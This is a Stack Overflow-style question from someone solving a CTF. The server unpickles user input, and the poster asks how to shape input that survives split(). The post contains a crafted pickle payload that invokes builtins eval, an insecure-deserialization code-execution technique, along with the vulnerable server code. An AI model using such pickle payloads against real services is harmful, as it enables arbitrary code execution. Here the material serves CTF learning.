# There is a way to find the value of somthing before splitting?

Tags: python, split, byte

Im now doing a CTF. This is the code of the server:

```
import pickle
pickle.loads(input().split()[0].encode())
```

and I need the pickle to load this:

```
b'c__builtin__\neval\nq\x00(X\x0f\x00\x00\x00print(locals())q\x01tq\x02Rq\x03.'
```

So

```
input().split()[0].encode()
```

need to be

```
b'c__builtin__\neval\nq\x00(X\x0f\x00\x00\x00print(locals())q\x01tq\x02Rq\x03.'
```

(input function returns a string).
The question is what input should i give in order for pickle to load this.

I tried to find what should I give as an input and came to a conclusion:

```
data = ?
x = data.split()[0]
if x.encode() == b'c_builtin_\neval\nq\x00(X\x0f\x00\x00\x00print(locals())q\x01tq\x02Rq\x03.': 
    print("ok")
```

The data is what I will give as an input. However, I don't know how to find it. Someone know if there is a way to find out what data should be so that the program will print ok?
note: you have to remember split() is also separating \n.

Comment: `split` need not split on `\n`, you can give it a string of characters as a parameter.

Comment: but I can't change the code, that's the point...